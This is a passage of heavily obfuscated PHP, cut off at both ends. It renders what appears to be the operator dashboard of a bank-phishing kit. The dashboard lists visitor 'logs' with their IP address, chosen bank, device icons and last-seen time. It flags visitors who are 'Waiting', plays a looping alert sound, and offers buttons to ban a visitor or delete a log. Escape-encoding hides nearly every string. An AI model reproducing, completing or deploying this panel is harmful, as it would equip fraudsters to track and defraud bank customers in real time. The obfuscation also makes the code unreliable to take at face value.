<?php echo "\x3c\x74\x72\40\40\x63\x6c\141\x73\x73\75\x22" . $waiting . "\42\x3e\x3c\x2f\x70\76"; echo "\x3c\x74\144\40\163\164\x79\154\145\75\x22\x63\x6f\x6c\x6f\x72\72\40\167\x68\x69\164\x65\73\x22\x3e\46\x23\70\62\60\x32\x3b\x26\43\x38\62\x30\x32\x3b\46\43\70\x32\60\62\73\x20\x20" . $wachten . ''; echo "\x3c\164\x64\40\x73\164\171\x6c\x65\x3d\42\143\157\154\x6f\x72\x3a\40\167\x68\x69\164\145\x3b\42\76" . $log["\165\163\145\x72\137\x69\144"] . "\40\74\x2f\x74\x64\76"; echo "\x3c\x74\144\x20\x73\164\171\x6c\x65\75\x22\x63\x6f\x6c\x6f\162\72\x20\x77\150\151\x74\145\73\x22\76" . $log["\x69\160"] . "\40\74\57\164\144\76"; echo "\x3c\x74\x64\x20\x73\164\171\154\x65\75\42\143\157\x6c\157\x72\x3a\40\x77\x68\x69\x74\145\x3b\x22\x3e\74\142\76" . (!empty($log["\142\141\156\x6b"]) ? $log["\142\141\x6e\x6b"] : "\x3c\x73\160\x61\x6e\76\116\117\124\x20\x53\105\x4c\105\x43\x54\x45\x44") . "\x3c\x2f\x62\x3e\x3c\57\x74\144\76"; echo "\74\164\x64\x20\163\x74\x79\154\x65\75\42\143\157\x6c\x6f\162\x3a\x20\167\150\x69\164\145\x3b\42\76\x3c\x73\160\141\156\40\143\154\141\163\x73\x3d\42\x76\163\163\x72\x74\x6a\145\42\x3e\x3c\163\160\141\x6e\x20\x73\164\171\x6c\145\75\42\146\157\x6e\164\x2d\x73\151\172\x65\72\x20\61\x38\x70\170\73\x22\40\143\154\x61\x73\x73\x3d\x22" . htmlspecialchars($osIcon) . "\x22\76\74\x2f\163\x70\141\156\76\40\x3c\x73\x70\x61\x6e\x20\x73\164\x79\x6c\x65\x3d\x22\x66\157\x6e\x74\55\x73\x69\172\x65\x3a\x20\61\x38\x70\170\x3b\42\40\143\x6c\x61\x73\163\x3d\x22" . htmlspecialchars($browserIcon) . "\42\x3e\74\x2f\163\160\141\156\x3e\74\x2f\x73\x70\141\x6e\76\40\12\x20\40\xa\40\x20\xa\x20\40\74\x73\164\171\154\x65\76\40\12\x20\40\166\x73\163\x72\x74\x6a\x65\40\x7b\xa\x20\x20\146\157\156\164\55\146\141\155\151\154\171\72\40\x6d\157\156\x6f\163\160\x61\x63\x65\73\xa\x20\40\12\x20\40\x7d\xa\40\40\x2e\x6f\x73\55\x69\x63\x6f\x6e\x3a\x62\145\x66\x6f\x72\x65\x20\x7b\xa\40\40\146\x6f\x6e\x74\55\x73\151\x7a\145\x3a\40\62\x34\x70\x78\73\12\40\x20\x6d\x61\162\x67\x69\156\55\162\x69\147\150\164\x3a\x20\70\160\170\x3b\xa\x20\x20\175\12\x20\40\56\x62\162\x6f\x77\x73\145\162\55\151\143\157\x6e\72\x62\145\x66\157\162\145\x20\x7b\xa\x20\40\x66\157\x6e\x74\x2d\x73\151\x7a\x65\x3a\40\x32\64\160\170\73\xa\x20\40\155\x61\x72\147\151\156\x2d\162\151\x67\150\x74\72\x20\x38\x70\170\x3b\xa\40\40\x7d\12\x20\40\x2e\x66\x61\55\x77\151\x6e\144\x6f\167\163\40\173\12\40\x20\143\x6f\154\157\x72\x3a\40\43\x39\143\64\144\x63\143\73\40\57\52\x20\x57\x69\x6e\144\157\167\163\40\143\157\x6c\x6f\162\x20\x2a\x2f\xa\x20\40\175\12\x20\40\xa\x20\x20\x2e\x66\141\55\141\x70\160\x6c\x65\40\173\xa\x20\x20\x63\157\x6c\157\162\72\x20\x23\71\x63\64\x64\143\x63\73\40\x2f\x2a\x20\115\x61\143\40\143\x6f\x6c\x6f\x72\x20\52\57\12\40\x20\x7d\12\x20\40\xa\x20\40\56\x66\141\55\154\x69\156\165\170\40\173\xa\x20\x20\x63\157\x6c\157\x72\72\40\x23\71\x63\x34\144\143\143\x3b\x20\x2f\52\x20\x4c\x69\156\165\170\40\x63\157\x6c\x6f\x72\40\52\x2f\xa\40\40\175\xa\x20\x20\xa\40\40\56\x66\141\55\x63\150\162\x6f\x6d\x65\x20\x7b\12\40\40\143\x6f\154\x6f\x72\x3a\40\x23\x39\143\x34\x64\x63\143\x3b\40\57\52\40\x43\150\x72\x6f\155\145\40\x63\x6f\x6c\x6f\162\40\x2a\x2f\xa\40\x20\175\xa\x20\40\xa\40\x20\56\146\x61\55\146\x69\162\145\x66\x6f\170\x20\x7b\xa\x20\x20\143\157\154\x6f\162\x3a\x20\x23\71\143\x34\x64\x63\x63\73\x20\x2f\52\40\106\151\x72\145\146\157\x78\40\x63\157\154\x6f\162\40\x2a\x2f\xa\x20\x20\x7d\xa\40\40\12\x20\40\x2e\x66\x61\55\x73\141\x66\141\162\151\40\x7b\xa\x20\x20\x63\157\154\x6f\162\x3a\40\x23\71\x63\x34\144\x63\x63\x3b\x20\x2f\x2a\x20\123\x61\146\x61\x72\151\x20\143\x6f\x6c\x6f\x72\40\52\x2f\12\40\x20\175\xa\x20\x20\xa\x20\40\56\146\141\55\x69\156\164\145\x72\x6e\145\164\x2d\x65\170\x70\x6c\157\x72\x65\162\x20\x7b\12\40\x20\143\157\154\x6f\162\72\x20\43\71\x63\64\x64\x63\143\x3b\x20\57\x2a\40\111\156\164\145\x72\x6e\145\x74\x20\x45\x78\160\154\x6f\x72\x65\162\x20\143\157\154\157\x72\x20\52\57\12\40\40\x7d\12\40\40\xa\x20\40\x2e\146\141\x2d\145\x64\x67\145\40\x7b\12\x20\x20\x63\x6f\154\157\x72\x3a\40\43\x39\143\64\144\143\143\73\40\x2f\x2a\40\x45\x64\x67\145\x20\x63\157\154\x6f\x72\x20\52\x2f\12\40\40\175\xa\x20\x20\xa\x20\x20\56\x66\141\55\157\x70\145\x72\141\40\x7b\12\x20\x20\143\x6f\x6c\157\162\72\x20\43\71\x63\64\144\143\143\x3b\40\57\52\40\117\160\x65\162\141\x20\x63\157\154\x6f\x72\x20\x2a\57\12\40\x20\x7d\xa\40\40\xa\40\x20\56\x66\141\55\142\162\x61\x76\145\x20\x7b\12\x20\x20\143\157\x6c\x6f\162\x3a\40\43\71\x63\64\x64\143\x63\73\x20\x2f\52\40\x42\162\x61\x76\x65\40\x63\157\x6c\157\162\40\x2a\x2f\12\x20\x20\x7d\xa\x20\40\12\x20\x20\x3c\x2f\163\164\171\x6c\145\76\74\57\x74\144\76"; echo "\74\164\x64\76\x3c\141\x20\x74\151\164\154\145\x3d\x22\x43\154\x69\x63\x6b\x20\164\157\x20\157\x70\x65\x6e\40\164\x68\x69\x73\40\114\157\x67\56\42\40\150\162\145\x66\x3d\x22\57\157\166\145\162\x76\x69\145\x77\57" . htmlspecialchars($log["\x75\x73\145\x72\x5f\151\x64"]) . "\x22\x20\x74\x61\x72\x67\145\x74\x3d\x22\x5f\x62\x6c\x61\156\x6b\x22\x3e\x3c\x62\165\164\164\x6f\156\40\143\154\141\163\163\x3d\42\142\x74\156\40\142\x74\x6e\x2d\157\165\x74\x6c\151\156\x65\x2d\x70\162\151\155\141\x72\171\x20\142\x74\x6e\55\x63\151\162\143\x6c\145\x20\x62\x74\x6e\55\x73\x6d\x22\x3e\74\151\40\x63\x6c\x61\x73\x73\75\x22\146\141\163\x20\x66\141\55\x65\170\x74\x65\162\x6e\141\154\55\x6c\151\x6e\153\55\141\x6c\164\x22\x3e\74\x2f\151\76\x3c\57\142\x75\164\164\x6f\156\x3e\74\57\141\76"; ?>
<button title="Click here to BAN user." class="btn btn-outline-warning btn-circle btn-sm" onclick="banUser('<?php echo htmlspecialchars($log["\165\163\145\162\137\x69\144"]); ?>
', '<?php echo htmlspecialchars($log["\151\160"]); ?>
')"><i class="fas fa-ban"></i></button>
<button title="Click here to DELETE this Log." class="btn btn-outline-danger btn-circle btn-sm shadow-lg" onclick="deleteLog('<?php echo htmlspecialchars($log["\x75\163\x65\x72\x5f\x69\x64"]); ?>
')" ><i class="fas fa-trash"></i></button> </td>
</tr>
</div>
</a>
</div>
</div>
</div>
</div>
<?php } } private function showLog($log) { $new_date = new \DateTime(); $old_date = new \DateTime($log["\154\141\163\164\137\143\157\x6e\x6e\x65\x63\164\145\x64"]); $interval = $old_date->diff($new_date); $minutes = $interval->i; $hours = $interval->h; $days = $interval->d; $total_minutes = $minutes + $hours * 60 + $days * 24 * 60; $timeString = ''; if ($total_minutes >= 60) { $hours = floor($total_minutes / 60); $minutes = $total_minutes % 60; $timeString = $hours . "\x20\x68\x6f\165\x72" . ($hours > 1 ? "\x73" : '') . "\x20\141\156\144\x20" . $minutes . "\40\x6d\151\156\x75\164\x65\x73" . ($minutes > 1 ? "\163" : '') . "\40\x61\x67\157"; } else { $timeString = $total_minutes . "\40\155\x69\x6e\165\164\x65\x73" . ($total_minutes > 1 ? "\x73" : '') . "\40\141\147\x6f"; } $bank = ''; if (!empty($log["\x62\141\156\153"])) { $bank = '' . $log["\142\x61\x6e\153"]; $user_id = $log["\x75\x73\x65\162\x5f\x69\x64"]; $ip = $log["\x69\160"]; $waiting = $log["\x77\141\151\x74\151\156\x67"]; $last_connected = $log["\x6c\141\163\x74\137\143\157\x6e\156\x65\x63\164\x65\144"]; } if ($log["\167\x61\151\164\151\x6e\x67"] == "\x74\162\165\145") { $waiting = "\x20\x62\x67\x2d\x62\154\x69\156\x6b"; $wachten = "\x20\xf0\x9f\224\xb4\x20\174\x20\x57\x61\151\x74\151\x6e\147"; echo "\74\x61\x75\144\x69\157\40\141\165\164\157\160\154\x61\171\40\154\157\157\x70\76\74\163\157\165\x72\x63\x65\40\x73\162\143\x3d\42\x2f\x61\165\144\x69\157\x2f\x76\x69\x73\x2e\x6d\160\63\42\x20\164\x79\160\145\75\42\141\165\144\151\x6f\57\155\x70\145\147\x22\76\x3c\57\141\x75\144\x69\157\x3e"; } else { if ($log["\x77\141\x69\164\x69\156\x67"] < 10) { $waiting = "\x20\x62\x67\x2d\163\165\x63\143\145\163\163"; $wachten = "\40\xf0\x9f\237\xa2\x20\174\40\117\156\154\151\156\x65"; } } if ($log["\x77\x61\x69\x74\151\x6e\x67"] == "\x66\x61\x6c\x73\x65") { $wachten = "\x20\342\x9a\xab\xf0\x9f\x9f\242"; } $diff = $new_date->getTimestamp() - $old_date->getTimestamp(); echo "\74\142\162\76\74\x62\162\76\74\144\x69\166\x20\x63\x6c\141\x73\x73\x3d\42\x72\157\x77\40\x70\x2d\x31\x22\76"; if ($log["\x77\x61\151\x74\151\x6e\147"] === "\x74\x72\x75\145") { echo "\x3c\x64\151\x76\x20\143\x6c\x61\x73\163\75\x22\x63\157\x6c\55\x31\62\42\x3e"; echo "\x3c\144\x69\166\x20\x63\154\x61\163\163\x3d\x22\x63\x6f\154\x2d\x31\62\40\x62\x67\x2d\142\154\x69\156\x6b\40\162\157\x75\x6e\144\145\x64\42\x3e"; echo "\74\x68\x31\x20\x63\x6c\x61\163\x73\x3d\42\164\x65\x78\x74\x2d\167\150\x69\x74\x65\x20\164\x65\x78\164\x2d\x63\145\x6e\x74\145\162\x20\x70\55\64\x22\40\151\x64\x3d\42\141\154\145\162\x74\x22\40\163\164\171\154\x65\x3d\42\x66\x6f\x6e\164\x2d\163\x69\x7a\145\x3a\x20\61\56\65\x72\145\155\x22\76\74\151\40\143\x6c\141\x73\x73\x3d\42\x66\x61\40\x66\141\x2d\167\151\146\151\42\40\141\162\x69\141\55\x68\151\x64\144\145\x6e\x3d\42\x74\x72\x75\x65\42\76\74\57\151\76\x20\103\x75\162\162\145\156\164\x6c\171\40\x57\x61\x69\x74\x69\156\147\74\x2f\x68\61\x3e"; echo "\74\57\144\151\166\x3e"; } else { if ($diff > 10) { echo "\74\x64\x69\x76\40\143\x6c\x61\x73\x73\75\42\143\x6f\x6c\x2d\61\x32\x22\76"; echo "\x3c\144\x69\166\40\143\154\141\x73\x73\75\42\143\157\154\x2d\x31\x32\40\x62\x67\55\144\141\162\153\145\x72\40\162\157\165\156\144\x65\144\x22\x3e"; echo "\74\150\x31\x20\x63\154\141\163\163\x3d\42\x74\145\x78\x74\x2d\167\x68\151\x74\x65\40\x74\x65\170\x74\x2d\143\145\x6e\x74\145\x72\40\x70\55\64\x22\40\151\144\x3d\42\x61\154\145\162\164\x22\x20\163\164\171\x6c\x65\75\42\146\x6f\x6e\x74\55\x73\x69\172\145\x3a\40\x31\56\x35\162\145\x6d\x22\76\x3c\x69\x20\x63\154\x61\163\x73\x3d\42\146\x61\x20\146\x61\55\x77\151\x66\151\x22\x20\141\x72\151\141\55\150\151\144\144\145\156\x3d\x22\x74\x72\x75\x65\x22\76\x3c\57\x69\x3e\x20\x43\165\162\162\x65\x6e\x74\154\171\40\117\146\146\x6c\x69\x6e\145\40\74\x2f\x68\x31\x3e"; echo "\74\57\x64\151\x76\x3e"; } else { echo "\74\144\151\166\x20\x63\154\x61\x73\x73\x3d\42\x63\x6f\x6c\x2d\x31\62\42\x3e"; echo "\74\144\x69\x76\40\x63\x6c\141\x73\x73\x3d\42\143\157\x6c\x2d\61\x32\x20\x62\147\55\163\x75\143\x63\x65\163\x73\x20\x72\x6f\165\x6e\144\145\x64\x22\x3e"; echo "\74\x68\61\40\x63\x6c\x61\163\163\75\x22\164\145\170\164\55\167\x68\151\x74\145\40\x74\x65\170\x74\55\x63\145\x6e\x74\x65\162\40\x70\x2d\x34\x22\40\x69\x64\x3d\42\x61\x6c\145\162\164\x22\40\x73\x74\x79\x6c\x65\75\x22\146\x6f\156\164\55\x73\x69\x7a\145\72\40\x31\56\x35\162\145\155\42\x3e\74\x69\x20\x63\154\x61\163\163\x3d\42\146\141\x20\x66\x61\x2d\x77\x69\x66\151\42\x20\141\162\151\x61\55\x68\x69\144\x64\x65\x6e\x3d\42\164\162\165\x65\42\76\74\x2f\x69\x3e\40\103\x75\162\162\x65\156\x74\x6c\x79\x20\117\x6e\x6c\x69\156\145\40\x3c\x2f\150\x31\x3e"; echo "\x3c\57\144\151\166\76"; } } echo "\x3c\142\162\76\74\x73\x74\171\154\145\76\56\x62\x6f\162\x64\x65\x72\55\x6c\x65\x66\164\55\x64\141\x6e\147\145\x72\40\173\12\40\40\142\157\162\x64\x65\x72\55\154\145\146\x74\72\40\60\x2e\x32\65\162\x65\x6d\40\163\157\154\x69\x64\x20\43\61\141\x31\x64\62\60\41\x69\x6d\x70\157\162\x74\141\x6e\164\73\12\40\40\175\x3c\57\x73\x74\x79\x6c\145\76\x3c\x64\151\x76\x20\143\154\141\x73\163\75\x22\162\157\x77\42\x3e\12\40\40\xa\x20\x20\40\x20\40\40\x20\x20\x20\40\x20\40\x20\40\74\144\151\x76\x20\143\x6c\141\x73\x73\75\42\143\x6f\154\x2d\170\154\55\63\40\143\157\154\55\155\x64\x2d\66\40\x6d\142\55\64\42\x3e\xa\40\40\40\40\40\x20\40\40\x20\12\40\40\12\x20\40\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\74\144\x69\166\40\x63\154\141\x73\163\75\x22\143\x61\x72\144\40\142\157\162\x64\x65\162\x2d\154\x65\x66\x74\x2d\144\x61\156\x67\x65\162\40\143\165\x73\x74\x6f\155\55\142\157\162\144\x65\x72\40\142\x67\55\144\141\x72\x6b\x65\162\x20\x68\55\61\x30\60\40\160\171\x2d\62\42\76\12\40\40\12\40\40\40\40\40\x20\40\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\40\40\74\144\x69\x76\x20\x63\x6c\x61\x73\163\75\x22\143\141\162\x64\55\x62\x6f\144\x79\42\x3e\12\x20\40\12\x20\40\x20\40\40\x20\x20\x20\x20\x20\x20\x20\40\40\40\x20\40\x20\40\x20\40\40\40\40\40\x20\74\144\x69\x76\x20\x63\x6c\141\163\163\x3d\x22\162\x6f\167\x20\156\x6f\55\147\x75\x74\164\145\162\163\40\x61\154\x69\x67\x6e\x2d\151\164\145\155\163\55\x63\x65\156\164\x65\162\42\x3e\xa\40\40\40\40\x20\x20\40\40\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\x20\x20\x3c\144\x69\x76\40\143\x6c\141\x73\x73\x3d\42\x63\x6f\154\40\155\162\x2d\x32\42\x3e\12\40\40\xa\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\40\x20\40\x20\x20\40\x20\40\40\40\40\40\x20\40\40\x20\x20\x20\40\x20\40\x20\x20\x3c\144\x69\x76\40\x63\154\x61\x73\x73\x3d\42\x74\x65\170\164\55\170\163\40\146\x6f\156\x74\x2d\167\x65\151\147\150\x74\x2d\x62\157\x6c\144\40\143\x75\163\x74\x6f\x6d\x2d\x74\145\x78\164\40\x74\x65\x78\164\x2d\x75\x70\160\x65\162\143\x61\x73\145\x20\x6d\142\55\x31\x22\76\xa\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\x20\40\40\x20\40\40\40\x20\40\40\x20\x20\40\40\x20\x20\40\40\x20\x3c\151\x20\x63\154\x61\x73\x73\x3d\42\x66\141\x20\x66\x61\x2d\143\x6c\x6f\x63\153\42\x20\141\162\151\141\x2d\x68\151\x64\x64\145\156\x3d\x22\x74\x72\165\145\42\x3e\74\x2f\x69\x3e\40\x3c\57\151\76\x4c\141\163\164\x20\x53\145\x65\x6e\74\57\x64\151\166\x3e\12\40\x20\40\40\x20\x20\x20\x20\x20\x20\40\40\x20\40\40\40\40\40\x20\40\40\40\40\x20\40\40\x20\x20\x20\x20\40\40\40\40\x3c\144\151\x76\x20\143\x6c\x61\x73\x73\75\42\150\65\40\x6d\x62\x2d\x30\40\146\157\156\164\x2d\x77\x65\x69\x67\150\x74\55\142\x6f\x6c\144\40\164\145\170\164\x2d\x77\x68\151\164\145\x22\76" . $timeString . "\x3c\57\144\x69\x76\x3e\12\40\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\40\40\x20\40\40\40\x20\x20\x20\40\40\40\x20\40\x20\x3c\57\144\151\166\76\12\40\x20\x20\40\x20\x20\x20\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\40\40\40\x20\40\40\40\40\x20\40\x20\74\144\151\166\x20\143\x6c\x61\163\x73\75\42\143\x6f\154\x2d\141\x75\164\157\42\x3e\xa\x20\x20\x20\40\40\40\x20\40\40\40\x20\x20\40\x20\40\40\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\xa\40\40\x20\x20\40\40\x20\x20\40\x20\40\40\40\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\x20\40\40\40\74\57\144\151\x76\x3e\12\40\40\40\x20\40\40\40\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\40\x20\40\x20\x20\x20\40\x3c\57\144\x69\x76\76\xa\x20\40\40\40\40\40\x20\x20\40\40\x20\40\40\x20\40\40\x20\x20\x20\40\x20\x20\x3c\57\x64\151\x76\x3e\12\40\40\40\x20\40\x20\x20\40\x20\x20\40\x20\40\40\40\x20\x20\40\x3c\57\x64\151\166\76\xa\x20\40\x20\40\40\x20\x20\40\40\x20\x20\x20\40\40\x3c\57\x64\151\x76\x3e\xa\40\x20\40\40\40\40\40\x20\x20\x20\40\40\40\x20\x3c\144\151\166\x20\143\154\141\163\163\x3d\42\x63\x6f\x6c\55\170\154\x2d\63\40\x63\157\x6c\55\155\144\x2d\66\x20\155\x62\55\64\x22\76\12\x20\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\40\x20\x20\x20\40\x3c\x64\151\x76\40\143\x6c\x61\163\x73\x3d\x22\143\x61\162\144\40\142\157\x72\x64\145\162\x2d\x6c\x65\x66\x74\55\x64\141\x6e\x67\x65\162\40\143\x75\x73\x74\x6f\155\x2d\x62\x6f\x72\144\145\162\40\x62\147\x2d\144\141\x72\153\145\162\40\150\x2d\x31\x30\60\x20\x70\x79\55\62\42\x3e\12\x20\x20\40\40\x20\40\40\40\x20\40\x20\40\40\40\x20\x20\40\40\x20\40\40\x20\74\x64\x69\166\x20\143\154\x61\163\163\x3d\x22\x63\141\x72\x64\55\142\157\144\x79\42\x3e\12\40\x20\40\40\40\40\x20\x20\x20\x20\40\40\40\40\40\x20\40\x20\x20\x20\40\x20\40\x20\40\40\x3c\x64\x69\166\40\143\154\x61\163\163\x3d\x22\x72\157\167\40\x6e\157\x2d\x67\x75\x74\x74\x65\162\163\40\141\x6c\x69\x67\156\x2d\x69\x74\x65\x6d\163\x2d\143\145\156\x74\145\x72\x22\x3e\xa\x20\x20\40\x20\40\x20\x20\40\40\40\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\40\x20\x20\x20\40\40\40\74\144\x69\x76\x20\x63\154\x61\x73\x73\x3d\42\143\157\154\40\155\162\x2d\x32\x22\x3e\xa\x20\40\40\x20\40\x20\40\40\40\40\40\40\40\x20\x20\x20\x20\40\40\40\x20\x20\40\x20\40\40\x20\40\x20\x20\40\x20\x20\40\x3c\x64\x69\166\x20\143\154\x61\x73\x73\x3d\42\x74\145\170\164\x2d\170\163\40\x66\x6f\x6e\164\55\x77\145\151\147\150\x74\x2d\142\x6f\154\x64\x20\x63\165\x73\x74\157\155\x2d\x74\145\170\x74\x20\x74\145\170\x74\55\165\x70\160\x65\162\x63\141\x73\145\40\x6d\142\x2d\x31\42\x3e\xa\x20\40\40\x20\40\40\40\x20\40\40\x20\40\40\40\x20\40\x20\40\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\74\151\40\x63\x6c\141\163\x73\75\42\146\x61\x20\x66\x61\55\x69\x6e\146\157\x2d\x63\151\162\143\x6c\145\x22\x20\141\162\151\141\55\150\x69\x64\144\145\156\x3d\x22\164\x72\x75\145\x22\76\x3c\57\x69\76\x20\111\x50\40\101\x44\x44\122\105\123\123\74\x2f\144\x69\166\76\xa\40\x20\x20\x20\40\x20\x20\40\40\40\x20\40\x20\40\x20\x20\40\40\40\40\x20\x20\40\40\x20\40\40\40\x20\40\40\40\40\x20\x3c\144\151\x76\x20\x63\154\x61\163\x73\x3d\42\x68\x35\x20\x6d\x62\55\60\x20\146\157\156\164\55\167\x65\x69\147\x68\x74\55\x62\x6f\154\144\40\x74\x65\170\x74\55\167\x68\151\x74\x65\x22\76" . $log["\x69\160"] . "\74\x2f\144\151\x76\x3e\xa\40\x20\40\x20\40\x20\40\40\40\40\40\x20\x20\40\x20\40\40\40\40\40\x20\40\x20\x20\x20\40\40\40\40\40\x3c\x2f\144\x69\x76\76\xa\40\x20\40\40\40\x20\x20\40\40\40\x20\x20\x20\40\x20\40\40\40\x20\40\40\x20\x20\x20\x20\x20\40\40\40\x20\x3c\x64\151\x76\x20\143\x6c\141\163\163\x3d\42\143\x6f\x6c\x2d\x61\165\164\157\x22\76\12\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\40\40\40\40\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\xa\x20\40\40\x20\40\40\40\40\x20\40\40\40\40\x20\40\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\40\74\x2f\144\151\166\76\xa\x20\x20\x20\40\40\x20\40\40\x20\40\x20\40\40\x20\40\40\x20\40\40\x20\x20\40\40\x20\x20\x20\x3c\x2f\144\x69\166\x3e\12\x20\x20\40\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\40\x20\x20\x20\x3c\x2f\x64\151\166\x3e\xa\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\40\x20\x20\x20\40\40\40\74\x2f\x64\151\x76\x3e\xa\40\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\74\57\x64\151\166\76\12\x20\40\x20\40\x20\40\x20\40\40\40\x20\40\40\40\74\144\151\x76\40\143\154\141\163\163\x3d\42\143\157\154\x2d\170\x6c\x2d\x33\40\x63\x6f\x6c\55\155\x64\x2d\66\x20\x6d\x62\55\x34\x22\76\xa\x20\x20\40\40\40\40\40\40\x20\40\40\40\40\40\40\40\40\x20\74\144\x69\166\40\x63\x6c\141\163\x73\75\x22\x63\x61\162\144\x20\x62\157\162\144\x65\162\x2d\x6c\145\146\164\55\144\141\156\147\x65\162\x20\x63\x75\x73\x74\157\x6d\55\142\157\162\144\145\162\40\142\x67\55\x64\141\x72\x6b\x65\x72\x20\150\55\61\60\x30\x20\160\171\55\x32\42\x3e\xa\x20\x20\x20\x20\x20\x20\40\40\x20\40\x20\x20\40\40\x20\40\x20\40\40\x20\40\40\x3c\x64\151\x76\40\143\154\141\x73\x73\75\42\x63\141\x72\x64\x2d\x62\157\x64\171\42\76\12\40\40\x20\40\x20\40\40\40\40\40\x20\40\40\40\x20\x20\x20\40\x20\40\x20\x20\40\40\40\40\x3c\144\x69\x76\40\143\154\141\x73\163\75\x22\162\157\x77\40\x6e\x6f\x2d\x67\165\x74\x74\145\x72\163\x20\141\x6c\x69\x67\x6e\x2d\151\x74\x65\155\x73\x2d\x63\x65\156\x74\x65\x72\42\76\12\40\x20\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\x20\40\40\40\40\40\x20\x20\x20\40\40\40\40\40\x3c\x64\x69\166\x20\x63\x6c\x61\x73\x73\x3d\x22\x63\x6f\154\40\x6d\x72\55\x32\42\x3e\xa\x20\x20\x20\40\x20\40\40\40\x20\40\x20\40\40\40\x20\40\40\x20\40\x20\40\40\40\x20\x20\40\x20\40\x20\x20\40\40\40\x20\74\144\x69\x76\x20\x63\x6c\x61\163\x73\75\x22\x74\x65\170\x74\x2d\x78\163\40\146\x6f\x6e\x74\55\x77\x65\x69\147\x68\x74\x2d\142\157\x6c\x64\x20\x63\x75\x73\x74\x6f\x6d\x2d\x74\x65\x78\164\x20\x74\145\x78\164\x2d\x75\160\160\145\162\143\x61\163\145\x20\x6d\x62\55\61\x22\x3e\12\x20\40\40\40\x20\40\x20\40\40\40\40\x20\x20\40\40\x20\x20\x20\x20\x20\40\40\40\x20\40\40\40\40\40\x20\x20\40\40\40\x20\x20\40\40\74\x69\40\143\x6c\141\x73\163\75\x22\x66\141\40\146\x61\x2d\x69\144\x2d\x63\x61\x72\x64\x22\x20\141\x72\x69\x61\55\x68\x69\144\x64\x65\156\x3d\x22\164\x72\x75\x65\x22\76\74\57\x69\76\x20\125\163\145\162\40\x49\x44\74\57\x64\x69\166\x3e\xa\x20\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\40\40\40\x3c\x64\151\166\40\x63\x6c\141\x73\163\75\42\150\65\x20\155\142\x2d\60\x20\146\157\x6e\164\55\x77\145\151\147\150\x74\55\x62\x6f\x6c\x64\40\164\x65\170\x74\55\167\150\151\164\x65\42\76" . $log["\x75\163\x65\162\137\x69\x64"] . "\x3c\x2f\144\151\166\76\12\x20\x20\x20\40\x20\40\x20\40\x20\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\40\40\40\x20\x20\40\40\x20\40\74\57\x64\x69\166\x3e\xa\40\x20\x20\40\40\x20\x20\x20\x20\x20\x20\x20\x20\x20\40\40\40\40\x20\x20\x20\40\40\x20\40\x20\40\40\x20\40\x3c\x64\x69\x76\x20\x63\x6c\x61\163\x73\75\x22\x63\x6f\x6c\55\141\x75\164\157\42\x3e\xa\x20\40\xa\x20\40\40\x20\x20\x20\40\40\40\40\x20\40\x20\40\x20\x20\40\40\40\40\40\x20\x20\40\40\40\40\40\40\x20\x3c\x2f\144\151\166\76\12\40\x20\40\x20\x20\40\x20\40\40\x20\40\40\x20\40\40\40\40\x20\40\x20\40\x20\40\x20\x20\40\74\57\x64\151\x76\76\xa\x20\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\40\40\x20\40\74\57\144\151\166\76\xa\x20\40\x20\40\x20\40\40\40\40\40\x20\x20\40\40\x20\x20\40\x20\x3c\57\144\151\x76\x3e\12\40\x20\x20\40\x20\40\x20\40\40\x20\x20\x20\x20\40\x3c\x2f\x64\x69\166\x3e\12\x20\x20\x20\40\x20\x20\x20\x20\40\40\40\40\40\40\74\144\x69\166\40\143\154\x61\163\163\x3d\42\143\x6f\154\x2d\170\x6c\x2d\x33\40\143\157\154\x2d\x6d\144\55\x36\40\155\142\55\64\42\76\xa\x20\x20\40\40\40\40\x20\x20\40\40\x20\40\40\x20\x20\40\40\x20\74\x64\x69\166\x20\x63\x6c\x61\x73\x73\75\42\x63\141\x72\x64\40\x62\157\162\144\145\x72\55\x6c\145\x66\164\55\x64\141\156\147\145\x72\40\143\x75\163\164\x6f\155\x2d\142\157\x72\x64\145\162\x20\x62\147\55\144\x61\162\153\145\162\40\x68\x2d\x31\60\x30\40\x70\171\x2d\62\42\76\xa\40\x20\x20\x20\x20\40\x20\40\x20\40\40\x20\40\x20\40\40\40\x20\x20\x20\x20\40\x3c\x64\151\x76\40\x63\x6c\141\163\163\75\42\x63\x61\x72\144\x2d\142\x6f\x64\171\42\x3e\xa\x20\40\40\40\40\40\x20\40\x20\40\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\40\x20\40\x20\x20\74\144\151\166\x20\x63\154\141\x73\x73\x3d\x22\162\157\x77\x20\x6e\x6f\x2d\147\165\x74\x74\145\162\x73\x20\x61\x6c\x69\x67\156\55\151\x74\x65\155\163\x2d\143\x65\x6e\x74\145\162\42\76\xa\x20\x20\40\x20\40\40\40\40\x20\40\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\40\40\40\40\x20\x3c\x64\151\x76\x20\143\154\x61\163\163\x3d\42\143\x6f\154\40\x6d\x72\x2d\x32\42\76\12\40\40\40\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\